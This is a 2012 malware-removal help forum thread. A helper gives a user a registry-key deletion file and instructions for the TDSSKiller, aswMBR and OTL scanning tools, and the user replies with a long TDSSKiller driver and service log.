worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 13 May 2012 - 10:25 AM

I can't run the online scan. After downloading it, it runs initial step and it keeps getting forced shut. I tried using a different browser to google ESET online scan, but all browsers (firefox, chrome, and IE) close down when I google that.

Attached Files



#11 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:41 PM

Posted 13 May 2012 - 10:43 AM

Hi,



Please carefully follow my next set of steps:



STEP 1


  • Go to Start -> Run...
  • Enter notepad in the Run dialog box.
  • Press Posted Image.
  • Highlight the contents of the following codebox, and copy and paste that text into notepad.
    Windows Registry Editor Version 5.00
    
    [-HKEY_LOCAL_MACHINE\SOFTWARE\GEDZAC LABS]
    
  • Select File -> Save.
  • Press the Desktop button on the left side of the save dialog.
  • In the Posted Image box, type in Fix.reg.
  • Press Posted Image.
  • Close Notepad.
  • Double click Posted Image on your desktop.
  • Press Yes, and then Ok, when prompted.
  • Right click on Posted Image and choose Delete.
  • Press Yes.


STEP 2



Please download the latest version of TDSSKiller from here and save it to your Desktop.

  • Doubleclick on TDSSKiller.exe to run the application, then click on Change parameters.

    Posted Image
  • Check the boxes beside Verify Driver Digital Signature and Detect TDLFS file system, then click OK.

    Posted Image
  • Click the Start Scan button.

    Posted Image
  • If a suspicious object is detected, the default action will be Skip, click on Continue.

    Posted Image
  • If malicious objects are found, they will show in the Scan results - Select action for found objects and offer three options.
    Ensure Cure (default) is selected, then click Continue > Reboot now to finish the cleaning process.

    Posted Image

    Note: If Cure is not available, please choose Skip instead, do not choose Delete unless instructed.
  • A report will be created in your root directory, (usually C:\ folder) in the form of "TDSSKiller.[Version]_[Date]_[Time]_log.txt". Please copy and paste the contents of that file here.


STEP 3



Please download aswMBR.exe to your desktop.

  • Double click the aswMBR.exe icon to run it.
  • The program will offers to download the latest antivirus definitions from Avast servers. Click YES to agree.
  • When it's done in the AV Scan drop down options choose C:\
    Posted Image
  • Click the Scan button to start the scan
  • On completion of the scan, click the save log button, save it to your desktop and post it in your next reply.
Note - do NOT attempt any Fix or FixMBR yet.



STEP 4


  • Please download OTL from the link below:
  • Save it to your desktop.
  • Double click on the Posted Image icon on your desktop.
  • OTL should now start. Change the following settings:
    - Click on Scan All Users checkbox given at the top.Posted Image
    - Under File Scans, change File age to 90
    - Check the boxes beside LOP Check and Purity Check
  • Copy and Paste the following code into the Posted Image textbox.
    netsvcs
    msconfig
    safebootminimal
    safebootnetwork
    "%WinDir%\$NtUninstallKB*$." /30
    C:\Program Files\Common Files\ComObjects\*.* /s
    %SYSTEMDRIVE%\*.*
    %USERPROFILE%\*.*
    %USERPROFILE%\Application Data\*.*
    %USERPROFILE%\Local Settings\Application Data\*.*
    %AllUsersProfile%\*.*
    %AllUsersProfile%\Application Data\*.*
    %USERPROFILE%\My Documents\*.*
    %CommonProgramFiles%\*.*
    %PROGRAMFILES%\*.*
    %systemroot%\system32\config\systemprofile\*.*
    %windir%\ServiceProfiles\LocalService\AppData\Local\Temp\*.*
    %windir%\ServiceProfiles\NetworkService\AppData\Local\Temp\*.*
    %windir%\temp*.*
    %windir%\system32\*.
    %systemroot%\system32\*.dll /lockedfiles
    %systemroot%\Tasks\*.job /lockedfiles
    %systemroot%\system32\drivers\*.sys /90
    %systemroot%\system32\drivers\*.sys /lockedfiles
    %systemroot%\system32\Spool\prtprocs\w32x86\*.dll
    %systemroot%\*. /rp /s
    %systemroot%\assembly\tmp\*.* /S /MD5
    %systemroot%\assembly\temp\*.* /S /MD5
    %systemroot%\assembly\GAC_32\*.* /S /MD5
    %systemroot%\assembly\GAC_MSIL\*.* /S /MD5
    /md5start
    smss.exe
    winlogon.exe
    services.exe
    lsass.exe
    svchost.exe
    explorer.exe
    netbt.sys
    ipsec.sys
    hlp.dat
    /md5stop
    
  • Push the Posted Image button.
  • Two reports will open, copy and paste them in a reply here:
    • OTL.txt <-- Will be opened
    • Extra.txt <-- Will be minimized



Regards,
Georgi

cXfZ4wS.png


#12 worries

worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 13 May 2012 - 01:20 PM

TDSS:
11:48:02.0203 0464 TDSS rootkit removing tool 2.7.34.0 May 2 2012 09:59:18
11:48:02.0484 0464 ============================================================
11:48:02.0484 0464 Current date / time: 2012/05/13 11:48:02.0484
11:48:02.0484 0464 SystemInfo:
11:48:02.0484 0464
11:48:02.0484 0464 OS Version: 5.1.2600 ServicePack: 3.0
11:48:02.0484 0464 Product type: Workstation
11:48:02.0484 0464 ComputerName: FELIX
11:48:02.0484 0464 UserName: Annie
11:48:02.0484 0464 Windows directory: C:\WINDOWS
11:48:02.0484 0464 System windows directory: C:\WINDOWS
11:48:02.0484 0464 Processor architecture: Intel x86
11:48:02.0484 0464 Number of processors: 2
11:48:02.0484 0464 Page size: 0x1000
11:48:02.0484 0464 Boot type: Normal boot
11:48:02.0484 0464 ============================================================
11:48:03.0390 0464 Drive \Device\Harddisk0\DR0 - Size: 0x25433D6000 (149.05 Gb), SectorSize: 0x200, Cylinders: 0x4C01, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
11:48:03.0390 0464 ============================================================
11:48:03.0390 0464 \Device\Harddisk0\DR0:
11:48:03.0390 0464 MBR partitions:
11:48:03.0390 0464 \Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x1402800, BlocksNum 0x11616800
11:48:03.0390 0464 ============================================================
11:48:03.0437 0464 C: <-> \Device\Harddisk0\DR0\Partition0
11:48:03.0437 0464 ============================================================
11:48:03.0437 0464 Initialize success
11:48:03.0437 0464 ============================================================
11:48:54.0484 1896 ============================================================
11:48:54.0484 1896 Scan started
11:48:54.0484 1896 Mode: Manual; SigCheck; TDLFS;
11:48:54.0484 1896 ============================================================
11:48:54.0828 1896 Abiosdsk - ok
11:48:54.0859 1896 abp480n5 (6abb91494fe6c59089b9336452ab2ea3) C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS
11:48:55.0343 1896 abp480n5 - ok
11:48:55.0406 1896 ACPI (8fd99680a539792a30e97944fdaecf17) C:\WINDOWS\system32\DRIVERS\ACPI.sys
11:48:55.0703 1896 ACPI - ok
11:48:55.0718 1896 ACPIEC (9859c0f6936e723e4892d7141b1327d5) C:\WINDOWS\system32\DRIVERS\ACPIEC.sys
11:48:56.0140 1896 ACPIEC - ok
11:48:56.0359 1896 adpu160m (9a11864873da202c996558b2106b0bbc) C:\WINDOWS\system32\DRIVERS\adpu160m.sys
11:48:56.0625 1896 adpu160m - ok
11:48:56.0828 1896 aec (8bed39e3c35d6a489438b8141717a557) C:\WINDOWS\system32\drivers\aec.sys
11:48:57.0109 1896 aec - ok
11:48:57.0140 1896 AFD (322d0e36693d6e24a2398bee62a268cd) C:\WINDOWS\System32\drivers\afd.sys
11:48:57.0437 1896 AFD - ok
11:48:57.0593 1896 agp440 (08fd04aa961bdc77fb983f328334e3d7) C:\WINDOWS\system32\DRIVERS\agp440.sys
11:48:57.0859 1896 agp440 - ok
11:48:58.0031 1896 agpCPQ (03a7e0922acfe1b07d5db2eeb0773063) C:\WINDOWS\system32\DRIVERS\agpCPQ.sys
11:48:58.0312 1896 agpCPQ - ok
11:48:58.0484 1896 Aha154x (c23ea9b5f46c7f7910db3eab648ff013) C:\WINDOWS\system32\DRIVERS\aha154x.sys
11:48:58.0578 1896 Aha154x - ok
11:48:58.0609 1896 aic78u2 (19dd0fb48b0c18892f70e2e7d61a1529) C:\WINDOWS\system32\DRIVERS\aic78u2.sys
11:48:58.0890 1896 aic78u2 - ok
11:48:58.0906 1896 aic78xx (b7fe594a7468aa0132deb03fb8e34326) C:\WINDOWS\system32\DRIVERS\aic78xx.sys
11:48:59.0187 1896 aic78xx - ok
11:48:59.0375 1896 Alerter (a9a3daa780ca6c9671a19d52456705b4) C:\WINDOWS\system32\alrsvc.dll
11:48:59.0640 1896 Alerter - ok
11:48:59.0828 1896 ALG (8c515081584a38aa007909cd02020b3d) C:\WINDOWS\System32\alg.exe
11:48:59.0921 1896 ALG - ok
11:48:59.0937 1896 AliIde (1140ab9938809700b46bb88e46d72a96) C:\WINDOWS\system32\DRIVERS\aliide.sys
11:49:00.0218 1896 AliIde - ok
11:49:00.0390 1896 alim1541 (cb08aed0de2dd889a8a820cd8082d83c) C:\WINDOWS\system32\DRIVERS\alim1541.sys
11:49:00.0671 1896 alim1541 - ok
11:49:00.0953 1896 Ambfilt (f6af59d6eee5e1c304f7f73706ad11d8) C:\WINDOWS\system32\drivers\Ambfilt.sys
11:49:01.0187 1896 Ambfilt - ok
11:49:01.0359 1896 amdagp (95b4fb835e28aa1336ceeb07fd5b9398) C:\WINDOWS\system32\DRIVERS\amdagp.sys
11:49:01.0640 1896 amdagp - ok
11:49:01.0812 1896 amsint (79f5add8d24bd6893f2903a3e2f3fad6) C:\WINDOWS\system32\DRIVERS\amsint.sys
11:49:01.0906 1896 amsint - ok
11:49:01.0921 1896 AppMgmt - ok
11:49:01.0953 1896 asc (62d318e9a0c8fc9b780008e724283707) C:\WINDOWS\system32\DRIVERS\asc.sys
11:49:02.0234 1896 asc - ok
11:49:02.0406 1896 asc3350p (69eb0cc7714b32896ccbfd5edcbea447) C:\WINDOWS\system32\DRIVERS\asc3350p.sys
11:49:02.0500 1896 asc3350p - ok
11:49:02.0531 1896 asc3550 (5d8de112aa0254b907861e9e9c31d597) C:\WINDOWS\system32\DRIVERS\asc3550.sys
11:49:02.0781 1896 asc3550 - ok
11:49:03.0062 1896 aspnet_state (0e5e4957549056e2bf2c49f4f6b601ad) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
11:49:03.0078 1896 aspnet_state - ok
11:49:03.0140 1896 AsyncMac (b153affac761e7f5fcfa822b9c4e97bc) C:\WINDOWS\system32\DRIVERS\asyncmac.sys
11:49:03.0437 1896 AsyncMac - ok
11:49:03.0625 1896 atapi (9f3a2f5aa6875c72bf062c712cfa2674) C:\WINDOWS\system32\DRIVERS\atapi.sys
11:49:03.0921 1896 atapi - ok
11:49:03.0937 1896 Atdisk - ok
11:49:03.0953 1896 Atmarpc (9916c1225104ba14794209cfa8012159) C:\WINDOWS\system32\DRIVERS\atmarpc.sys
11:49:04.0234 1896 Atmarpc - ok
11:49:04.0421 1896 AudioSrv (def7a7882bec100fe0b2ce2549188f9d) C:\WINDOWS\System32\audiosrv.dll
11:49:04.0734 1896 AudioSrv - ok
11:49:04.0921 1896 audstub (d9f724aa26c010a217c97606b160ed68) C:\WINDOWS\system32\DRIVERS\audstub.sys
11:49:05.0203 1896 audstub - ok
11:49:05.0515 1896 BCM43XX (fe4ed785396eaa554c561992106a35fa) C:\WINDOWS\system32\DRIVERS\bcmwl5.sys
11:49:05.0718 1896 BCM43XX - ok
11:49:05.0859 1896 Beep (da1f27d85e0d1525f6621372e7b685e9) C:\WINDOWS\system32\drivers\Beep.sys
11:49:06.0140 1896 Beep - ok
11:49:06.0375 1896 BITS (574738f61fca2935f5265dc4e5691314) C:\WINDOWS\system32\qmgr.dll
11:49:06.0718 1896 BITS - ok
11:49:06.0921 1896 Browser (a06ce3399d16db864f55faeb1f1927a9) C:\WINDOWS\System32\browser.dll
11:49:07.0203 1896 Browser - ok
11:49:07.0203 1896 catchme - ok
11:49:07.0390 1896 cbidf (90a673fc8e12a79afbed2576f6a7aaf9) C:\WINDOWS\system32\DRIVERS\cbidf2k.sys
11:49:07.0656 1896 cbidf - ok
11:49:07.0671 1896 cbidf2k (90a673fc8e12a79afbed2576f6a7aaf9) C:\WINDOWS\system32\drivers\cbidf2k.sys
11:49:07.0937 1896 cbidf2k - ok
11:49:07.0968 1896 CCDECODE (0be5aef125be881c4f854c554f2b025c) C:\WINDOWS\system32\DRIVERS\CCDECODE.sys
11:49:08.0234 1896 CCDECODE - ok
11:49:08.0421 1896 cd20xrnt (f3ec03299634490e97bbce94cd2954c7) C:\WINDOWS\system32\DRIVERS\cd20xrnt.sys
11:49:08.0531 1896 cd20xrnt - ok
11:49:08.0546 1896 Cdaudio (c1b486a7658353d33a10cc15211a873b) C:\WINDOWS\system32\drivers\Cdaudio.sys
11:49:08.0812 1896 Cdaudio - ok
11:49:09.0000 1896 Cdfs (c885b02847f5d2fd45a24e219ed93b32) C:\WINDOWS\system32\drivers\Cdfs.sys
11:49:09.0296 1896 Cdfs - ok
11:49:09.0500 1896 Cdrom (4b0a100eaf5c49ef3cca8c641431eacc) C:\WINDOWS\system32\DRIVERS\cdrom.sys
11:49:09.0546 1896 Cdrom - ok
11:49:09.0546 1896 Changer - ok
11:49:09.0593 1896 CiSvc (1cfe720eb8d93a7158a4ebc3ab178bde) C:\WINDOWS\system32\cisvc.exe
11:49:09.0890 1896 CiSvc - ok
11:49:09.0921 1896 ClipSrv (34cbe729f38138217f9c80212a2a0c82) C:\WINDOWS\system32\clipsrv.exe
11:49:10.0218 1896 ClipSrv - ok
11:49:10.0468 1896 clr_optimization_v2.0.50727_32 (d87acaed61e417bba546ced5e7e36d9c) C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
11:49:10.0500 1896 clr_optimization_v2.0.50727_32 - ok
11:49:10.0531 1896 CmBatt (0f6c187d38d98f8df904589a5f94d411) C:\WINDOWS\system32\DRIVERS\CmBatt.sys
11:49:10.0828 1896 CmBatt - ok
11:49:11.0015 1896 CmdIde (e5dcb56c533014ecbc556a8357c929d5) C:\WINDOWS\system32\DRIVERS\cmdide.sys
11:49:11.0281 1896 CmdIde - ok
11:49:11.0484 1896 Compbatt (6e4c9f21f0fae8940661144f41b13203) C:\WINDOWS\system32\DRIVERS\compbatt.sys
11:49:11.0750 1896 Compbatt - ok
11:49:11.0765 1896 COMSysApp - ok
11:49:11.0921 1896 Cpqarray (3ee529119eed34cd212a215e8c40d4b6) C:\WINDOWS\system32\DRIVERS\cpqarray.sys
11:49:12.0187 1896 Cpqarray - ok
11:49:12.0375 1896 CryptSvc (3d4e199942e29207970e04315d02ad3b) C:\WINDOWS\System32\cryptsvc.dll
11:49:12.0656 1896 CryptSvc - ok
11:49:12.0843 1896 dac2w2k (e550e7418984b65a78299d248f0a7f36) C:\WINDOWS\system32\DRIVERS\dac2w2k.sys
11:49:13.0140 1896 dac2w2k - ok
11:49:13.0156 1896 dac960nt (683789caa3864eb46125ae86ff677d34) C:\WINDOWS\system32\DRIVERS\dac960nt.sys
11:49:13.0437 1896 dac960nt - ok
11:49:13.0656 1896 DcomLaunch (6b27a5c03dfb94b4245739065431322c) C:\WINDOWS\system32\rpcss.dll
11:49:13.0734 1896 DcomLaunch - ok
11:49:13.0781 1896 Dhcp (5e38d7684a49cacfb752b046357e0589) C:\WINDOWS\System32\dhcpcsvc.dll
11:49:14.0078 1896 Dhcp - ok
11:49:14.0109 1896 Disk (044452051f3e02e7963599fc8f4f3e25) C:\WINDOWS\system32\DRIVERS\disk.sys
11:49:14.0421 1896 Disk - ok
11:49:14.0453 1896 DKbFltr (060db81dfb79c8244eb65d10b6c7873f) C:\WINDOWS\system32\DRIVERS\DKbFltr.sys
11:49:14.0484 1896 DKbFltr - ok
11:49:14.0500 1896 dmadmin - ok
11:49:14.0578 1896 dmboot (d992fe1274bde0f84ad826acae022a41) C:\WINDOWS\system32\drivers\dmboot.sys
11:49:14.0906 1896 dmboot - ok
11:49:14.0953 1896 dmio (7c824cf7bbde77d95c08005717a95f6f) C:\WINDOWS\system32\drivers\dmio.sys
11:49:15.0234 1896 dmio - ok
11:49:15.0406 1896 dmload (e9317282a63ca4d188c0df5e09c6ac5f) C:\WINDOWS\system32\drivers\dmload.sys
11:49:15.0656 1896 dmload - ok
11:49:15.0859 1896 dmserver (57edec2e5f59f0335e92f35184bc8631) C:\WINDOWS\System32\dmserver.dll
11:49:16.0140 1896 dmserver - ok
11:49:16.0343 1896 DMusic (8a208dfcf89792a484e76c40e5f50b45) C:\WINDOWS\system32\drivers\DMusic.sys
11:49:16.0609 1896 DMusic - ok
11:49:16.0781 1896 Dnscache (474b4dc3983173e4b4c9740b0dac98a6) C:\WINDOWS\System32\dnsrslvr.dll
11:49:17.0046 1896 Dnscache - ok
11:49:17.0093 1896 Dot3svc (0f0f6e687e5e15579ef4da8dd6945814) C:\WINDOWS\System32\dot3svc.dll
11:49:17.0359 1896 Dot3svc - ok
11:49:17.0531 1896 dpti2o (40f3b93b4e5b0126f2f5c0a7a5e22660) C:\WINDOWS\system32\DRIVERS\dpti2o.sys
11:49:17.0796 1896 dpti2o - ok
11:49:18.0046 1896 DritekPortIO (5c918d413f5837e67a85775c9873775e) C:\PROGRA~1\LAUNCH~1\DPortIO.sys
11:49:18.0125 1896 DritekPortIO - ok
11:49:18.0171 1896 drmkaud (8f5fcff8e8848afac920905fbd9d33c8) C:\WINDOWS\system32\drivers\drmkaud.sys
11:49:18.0453 1896 drmkaud - ok
11:49:18.0640 1896 dtsoftbus01 (687af6bb383885ff6a64071b189a7f3e) C:\WINDOWS\system32\DRIVERS\dtsoftbus01.sys
11:49:18.0671 1896 dtsoftbus01 - ok
11:49:18.0718 1896 EapHost (2187855a7703adef0cef9ee4285182cc) C:\WINDOWS\System32\eapsvc.dll
11:49:18.0984 1896 EapHost - ok
11:49:19.0015 1896 ERSvc (bc93b4a066477954555966d77fec9ecb) C:\WINDOWS\System32\ersvc.dll
11:49:19.0296 1896 ERSvc - ok
11:49:19.0484 1896 Eventlog (65df52f5b8b6e9bbd183505225c37315) C:\WINDOWS\system32\services.exe
11:49:19.0531 1896 Eventlog - ok
11:49:19.0578 1896 EventSystem (d4991d98f2db73c60d042f1aef79efae) C:\WINDOWS\system32\es.dll
11:49:19.0656 1896 EventSystem - ok
11:49:19.0703 1896 Fastfat (38d332a6d56af32635675f132548343e) C:\WINDOWS\system32\drivers\Fastfat.sys
11:49:19.0984 1896 Fastfat - ok
11:49:20.0031 1896 FastUserSwitchingCompatibility (1926899bf9ffe2602b63074971700412) C:\WINDOWS\System32\shsvcs.dll
11:49:20.0296 1896 FastUserSwitchingCompatibility - ok
11:49:20.0500 1896 Fax (e97d6a8684466df94ff3bc24fb787a07) C:\WINDOWS\system32\fxssvc.exe
11:49:20.0796 1896 Fax - ok
11:49:21.0015 1896 Fdc (92cdd60b6730b9f50f6a1a0c1f8cdc81) C:\WINDOWS\system32\drivers\Fdc.sys
11:49:21.0281 1896 Fdc - ok
11:49:21.0484 1896 Fips (d45926117eb9fa946a6af572fbe1caa3) C:\WINDOWS\system32\drivers\Fips.sys
11:49:21.0781 1896 Fips - ok
11:49:21.0781 1896 Flpydisk (9d27e7b80bfcdf1cdd9b555862d5e7f0) C:\WINDOWS\system32\drivers\Flpydisk.sys
11:49:22.0203 1896 Flpydisk - ok
11:49:22.0406 1896 FltMgr (b2cf4b0786f8212cb92ed2b50c6db6b0) C:\WINDOWS\system32\DRIVERS\fltMgr.sys
11:49:22.0687 1896 FltMgr - ok
11:49:23.0015 1896 FontCache3.0.0.0 (8ba7c024070f2b7fdd98ed8a4ba41789) C:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
11:49:23.0031 1896 FontCache3.0.0.0 - ok
11:49:23.0093 1896 Fs_Rec (3e1e2bd4f39b0e2b7dc4f4d2bcc2779a) C:\WINDOWS\system32\drivers\Fs_Rec.sys
11:49:23.0359 1896 Fs_Rec - ok
11:49:23.0546 1896 Ftdisk (6ac26732762483366c3969c9e4d2259d) C:\WINDOWS\system32\DRIVERS\ftdisk.sys
11:49:23.0812 1896 Ftdisk - ok
11:49:24.0000 1896 Gpc (0a02c63c8b144bd8c86b103dee7c86a2) C:\WINDOWS\system32\DRIVERS\msgpc.sys
11:49:24.0312 1896 Gpc - ok
11:49:24.0500 1896 HDAudBus (573c7d0a32852b48f3058cfd8026f511) C:\WINDOWS\system32\DRIVERS\HDAudBus.sys
11:49:24.0781 1896 HDAudBus - ok
11:49:25.0031 1896 helpsvc (4fcca060dfe0c51a09dd5c3843888bcd) C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll
11:49:25.0312 1896 helpsvc - ok
11:49:25.0328 1896 HidServ - ok
11:49:25.0515 1896 hkmsvc (8878bd685e490239777bfe51320b88e9) C:\WINDOWS\System32\kmsvc.dll
11:49:25.0796 1896 hkmsvc - ok
11:49:26.0000 1896 hpn (b028377dea0546a5fcfba928a8aefae0) C:\WINDOWS\system32\DRIVERS\hpn.sys
11:49:26.0265 1896 hpn - ok
11:49:26.0453 1896 HTTP (f6aacf5bce2893e0c1754afeb672e5c9) C:\WINDOWS\system32\Drivers\HTTP.sys
11:49:26.0750 1896 HTTP - ok
11:49:26.0953 1896 HTTPFilter (6100a808600f44d999cebdef8841c7a3) C:\WINDOWS\System32\w3ssl.dll
11:49:27.0250 1896 HTTPFilter - ok
11:49:27.0453 1896 hwdatacard (20330198554b7ddb44403af21d6ae179) C:\WINDOWS\system32\DRIVERS\ewusbmdm.sys
11:49:27.0515 1896 hwdatacard - ok
11:49:27.0546 1896 hwusbdev (922065957563d851b5a68b95aadac6ad) C:\WINDOWS\system32\DRIVERS\ewusbdev.sys
11:49:27.0593 1896 hwusbdev - ok
11:49:27.0640 1896 i2omgmt (9368670bd426ebea5e8b18a62416ec28) C:\WINDOWS\system32\drivers\i2omgmt.sys
11:49:27.0906 1896 i2omgmt - ok
11:49:27.0921 1896 i2omp (f10863bf1ccc290babd1a09188ae49e0) C:\WINDOWS\system32\DRIVERS\i2omp.sys
11:49:28.0203 1896 i2omp - ok
11:49:28.0234 1896 i8042prt (4a0b06aa8943c1e332520f7440c0aa30) C:\WINDOWS\system32\DRIVERS\i8042prt.sys
11:49:28.0484 1896 i8042prt - ok
11:49:28.0593 1896 IAANTMON (cb686f44bf955ea02520710a56874fa4) C:\Program Files\Intel\Intel Matrix Storage Manager\IAANTMon.exe
11:49:28.0656 1896 IAANTMON - ok
11:49:29.0046 1896 ialm (48846b31be5a4fa662ccfde7a1ba86b9) C:\WINDOWS\system32\DRIVERS\igxpmp32.sys
11:49:29.0500 1896 ialm - ok
11:49:29.0671 1896 iaStor (db0cc620b27a928d968c1a1e9cd9cb87) C:\WINDOWS\system32\drivers\iaStor.sys
11:49:29.0687 1896 iaStor - ok
11:49:29.0906 1896 idsvc (c01ac32dc5c03076cfb852cb5da5229c) C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
11:49:30.0031 1896 idsvc - ok
11:49:30.0078 1896 Imapi (083a052659f5310dd8b6a6cb05edcf8e) C:\WINDOWS\system32\DRIVERS\imapi.sys
11:49:30.0359 1896 Imapi - ok
11:49:30.0578 1896 ImapiService (30deaf54a9755bb8546168cfe8a6b5e1) C:\WINDOWS\system32\imapi.exe
11:49:31.0031 1896 ImapiService - ok
11:49:31.0093 1896 ini910u (4a40e045faee58631fd8d91afc620719) C:\WINDOWS\system32\DRIVERS\ini910u.sys
11:49:31.0359 1896 ini910u - ok
11:49:31.0859 1896 IntcAzAudAddService (cb1113029fae50c685198eabd9885161) C:\WINDOWS\system32\drivers\RtkHDAud.sys
11:49:32.0312 1896 IntcAzAudAddService - ok
11:49:32.0453 1896 IntelIde (b5466a9250342a7aa0cd1fba13420678) C:\WINDOWS\system32\DRIVERS\intelide.sys
11:49:32.0718 1896 IntelIde - ok
11:49:32.0921 1896 intelppm (8c953733d8f36eb2133f5bb58808b66b) C:\WINDOWS\system32\DRIVERS\intelppm.sys
11:49:33.0187 1896 intelppm - ok
11:49:33.0203 1896 Ip6Fw (3bb22519a194418d5fec05d800a19ad0) C:\WINDOWS\system32\DRIVERS\Ip6Fw.sys
11:49:33.0484 1896 Ip6Fw - ok
11:49:33.0656 1896 IpFilterDriver (731f22ba402ee4b62748adaf6363c182) C:\WINDOWS\system32\DRIVERS\ipfltdrv.sys
11:49:33.0921 1896 IpFilterDriver - ok
11:49:33.0953 1896 IpInIp (b87ab476dcf76e72010632b5550955f5) C:\WINDOWS\system32\DRIVERS\ipinip.sys
11:49:34.0218 1896 IpInIp - ok
11:49:34.0421 1896 IpNat (cc748ea12c6effde940ee98098bf96bb) C:\WINDOWS\system32\DRIVERS\ipnat.sys
11:49:34.0734 1896 IpNat - ok
11:49:34.0906 1896 IPSec (23c74d75e36e7158768dd63d92789a91) C:\WINDOWS\system32\DRIVERS\ipsec.sys
11:49:35.0187 1896 IPSec - ok
11:49:35.0375 1896 IRENUM (c93c9ff7b04d772627a3646d89f7bf89) C:\WINDOWS\system32\DRIVERS\irenum.sys
11:49:35.0484 1896 IRENUM - ok
11:49:35.0515 1896 isapnp (05a299ec56e52649b1cf2fc52d20f2d7) C:\WINDOWS\system32\DRIVERS\isapnp.sys
11:49:35.0796 1896 isapnp - ok
11:49:36.0046 1896 JavaQuickStarterService (9ae07549a0d691a103faf8946554bdb7) C:\Program Files\Java\jre6\bin\jqs.exe
11:49:36.0062 1896 JavaQuickStarterService - ok
11:49:36.0125 1896 Kbdclass (463c1ec80cd17420a542b7f36a36f128) C:\WINDOWS\system32\DRIVERS\kbdclass.sys
11:49:36.0406 1896 Kbdclass - ok
11:49:36.0593 1896 kmixer (692bcf44383d056aed41b045a323d378) C:\WINDOWS\system32\drivers\kmixer.sys
11:49:37.0031 1896 kmixer - ok
11:49:37.0078 1896 KSecDD (1705745d900dabf2d89f90ebaddc7517) C:\WINDOWS\system32\drivers\KSecDD.sys
11:49:37.0359 1896 KSecDD - ok
11:49:37.0562 1896 L1c (6c8658587e91ea25b0fd2e71781ad228) C:\WINDOWS\system32\DRIVERS\l1c51x86.sys
11:49:37.0625 1896 L1c - ok
11:49:37.0671 1896 LanmanServer (f385f4b02c535bffe1d70cab80838123) C:\WINDOWS\System32\srvsvc.dll
11:49:37.0953 1896 LanmanServer - ok
11:49:38.0015 1896 lanmanworkstation (1b67b632786fef1c1bbaef46c2f3f2e6) C:\WINDOWS\System32\wkssvc.dll
11:49:38.0281 1896 lanmanworkstation - ok
11:49:38.0281 1896 lbrtfdc - ok
11:49:38.0500 1896 LmHosts (a7db739ae99a796d91580147e919cc59) C:\WINDOWS\System32\lmhsvc.dll
11:49:38.0781 1896 LmHosts - ok
11:49:38.0968 1896 Messenger (986b1ff5814366d71e0ac5755c88f2d3) C:\WINDOWS\System32\msgsvc.dll
11:49:39.0234 1896 Messenger - ok
11:49:39.0500 1896 Microsoft Office Groove Audit Service (fafe367d032ed82e9332b4c741a20216) C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe
11:49:39.0531 1896 Microsoft Office Groove Audit Service - ok
11:49:39.0562 1896 mnmdd (4ae068242760a1fb6e1a44bf4e16afa6) C:\WINDOWS\system32\drivers\mnmdd.sys
11:49:39.0828 1896 mnmdd - ok
11:49:39.0875 1896 mnmsrvc (d18f1f0c101d06a1c1adf26eed16fcdd) C:\WINDOWS\system32\mnmsrvc.exe
11:49:40.0140 1896 mnmsrvc - ok
11:49:40.0171 1896 Modem (dfcbad3cec1c5f964962ae10e0bcc8e1) C:\WINDOWS\system32\drivers\Modem.sys
11:49:40.0453 1896 Modem - ok
11:49:40.0703 1896 Monfilt (9fa7207d1b1adead88ae8eed9cdbbaa5) C:\WINDOWS\system32\drivers\Monfilt.sys
11:49:40.0906 1896 Monfilt - ok
11:49:40.0921 1896 Mouclass (35c9e97194c8cfb8430125f8dbc34d04) C:\WINDOWS\system32\DRIVERS\mouclass.sys
11:49:41.0187 1896 Mouclass - ok
11:49:41.0375 1896 MountMgr (a80b9a0bad1b73637dbcbba7df72d3fd) C:\WINDOWS\system32\drivers\MountMgr.sys
11:49:41.0640 1896 MountMgr - ok
11:49:41.0812 1896 mraid35x (3f4bb95e5a44f3be34824e8e7caf0737) C:\WINDOWS\system32\DRIVERS\mraid35x.sys
11:49:42.0078 1896 mraid35x - ok
11:49:42.0109 1896 MRxDAV (11d42bb6206f33fbb3ba0288d3ef81bd) C:\WINDOWS\system32\DRIVERS\mrxdav.sys
11:49:42.0375 1896 MRxDAV - ok
11:49:42.0437 1896 MRxSmb (60ae98742484e7ab80c3c1450e708148) C:\WINDOWS\system32\DRIVERS\mrxsmb.sys
11:49:42.0515 1896 MRxSmb - ok
11:49:42.0546 1896 MSDTC (a137f1470499a205abbb9aafb3b6f2b1) C:\WINDOWS\system32\msdtc.exe
11:49:42.0812 1896 MSDTC - ok
11:49:43.0015 1896 Msfs (c941ea2454ba8350021d774daf0f1027) C:\WINDOWS\system32\drivers\Msfs.sys
11:49:43.0281 1896 Msfs - ok
11:49:43.0281 1896 MSIServer - ok
11:49:43.0500 1896 MSKSSRV (d1575e71568f4d9e14ca56b7b0453bf1) C:\WINDOWS\system32\drivers\MSKSSRV.sys
11:49:43.0765 1896 MSKSSRV - ok
11:49:43.0812 1896 MSPCLOCK (325bb26842fc7ccc1fcce2c457317f3e) C:\WINDOWS\system32\drivers\MSPCLOCK.sys
11:49:44.0062 1896 MSPCLOCK - ok
11:49:44.0062 1896 MSPQM (bad59648ba099da4a17680b39730cb3d) C:\WINDOWS\system32\drivers\MSPQM.sys
11:49:44.0312 1896 MSPQM - ok
11:49:44.0359 1896 mssmbios (af5f4f3f14a8ea2c26de30f7a1e17136) C:\WINDOWS\system32\DRIVERS\mssmbios.sys
11:49:44.0609 1896 mssmbios - ok
11:49:44.0796 1896 MSTEE (e53736a9e30c45fa9e7b5eac55056d1d) C:\WINDOWS\system32\drivers\MSTEE.sys
11:49:45.0046 1896 MSTEE - ok
11:49:45.0062 1896 Mup (2f625d11385b1a94360bfc70aaefdee1) C:\WINDOWS\system32\drivers\Mup.sys
11:49:45.0328 1896 Mup - ok
